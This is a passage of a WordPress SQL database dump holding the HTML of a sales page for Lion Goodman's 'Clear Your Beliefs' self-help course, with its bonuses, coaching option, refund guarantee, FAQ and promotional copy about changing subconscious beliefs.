Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 16:43:02', '2014-06-17 21:43:02', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(945, 4194, '2014-06-17 17:07:17', '2014-06-17 22:07:17', '<div style="width: 115%; margin-left: -40px;">\n\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\n</div>\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n&nbsp;\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n<ul class="indented-img-left">\n	<li>You''re no longer held back by old beliefs and stories.</li>\n	<li>There''s no resistance to doing what needs to be done.</li>\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\n</ul>\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\n\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\n\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\nDear Explorer:\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs 